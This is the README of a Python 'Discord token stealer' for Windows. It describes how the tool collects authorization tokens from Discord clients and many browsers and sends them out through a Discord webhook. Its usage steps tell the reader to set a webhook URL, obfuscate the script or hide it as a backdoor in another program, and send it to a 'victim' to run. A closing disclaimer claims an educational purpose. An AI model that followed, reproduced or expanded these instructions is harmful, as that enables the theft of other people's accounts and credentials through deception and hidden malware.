Discord Token Stealer
A Discord token stealer app written in Python 3.
This version of the grabber only supports Windows.
Features
- No local caching
- Transfers via Discord webhook
- Searches for authorization tokens in multiple directories (Discord, Discord PTB, Discord Canary, Google Chrome, Firefox, Opera, Microsoft Edge, Brave, Yandex and Vivaldi)
- No external Python modules required
How to use
- Create a webhook on your Discord server. I recommend you to create a new server.
- Change the 'WEBHOOK_URL' variable value to your Discord webhook URL in token_stealer.py
- (obfuscate the code or install it as a backdoor in an other script.)
- Send the script to your victim and make them run it.
Author
Disclaimer
- All responsibilities are at your own risk.
- This app developed for educational purposes only.
Credit
Used both of the wodx's code.